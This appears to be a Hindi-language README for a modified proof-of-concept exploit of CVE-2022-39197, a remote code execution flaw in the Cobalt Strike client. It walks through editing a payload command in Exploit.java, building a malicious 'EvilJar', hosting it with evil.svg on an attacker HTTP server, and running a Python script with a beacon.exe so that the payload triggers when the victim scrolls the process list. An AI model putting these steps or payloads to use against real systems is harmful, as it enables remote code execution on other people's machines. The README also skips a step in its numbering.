
CVE-2022-39197 RCE POC
यह प्रोजेक्ट @its-arun के प्रोजेक्ट https://github.com/its-arun/CVE-2022-39197 से संशोधित किया गया है।
जब मैंने स्क्रिप्ट का परीक्षण किया, तो मैंने पाया कि फ्रिडा स्क्रिप्ट सामान्य क्रम में डेटा क्वेरी नहीं कर पा रही थी। प्रक्रिया नाम को संशोधित करने के लिए फ्रिडा स्क्रिप्ट को संशोधित करने की विधि।
उपयोग विधि में योगदान के लिए मास्टर @Kai5174 का धन्यवाद।
1、अपने पेलोड के साथ निष्पादित कमांड को EvilJar/src/main/java/Exploit.java में संपादित करें, अब यह केवल कैलकुलेटर चला सकता है।
2、mvn clean compile assembly:single का उपयोग करके jar बनाएँ।
4、EvilJar-1.0-jar-with-dependencies.jar को EvilJar/target/ से serve/ फ़ोल्डर में ले जाएँ।
5、serve\evil.svg में [attacker] को बदलने के लिए संपादित करें।
6、python3 -m http.server 8080 का उपयोग करके सर्व करें।
7、C2 संस्करण 4.7 या उससे कम के साथ beacon.exe जनरेट करें।
8、आपको Windows पर py स्क्रिप्ट निष्पादित करनी होगी ताकि ऑनलाइन हो सकें, और जब क्लाइंट प्रक्रिया सूची तक पहुँचता है और beacon.exe प्रक्रिया देखता है, तो प्रतिकार उपाय करें।
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
जैसे ही उपयोगकर्ता प्रक्रिया सूची में स्क्रॉल करता है, पेलोड ट्रिगर हो जाएगा।
Windows

Mac

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — इस भेद्यता का एक शानदार गहन विश्लेषण है। https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html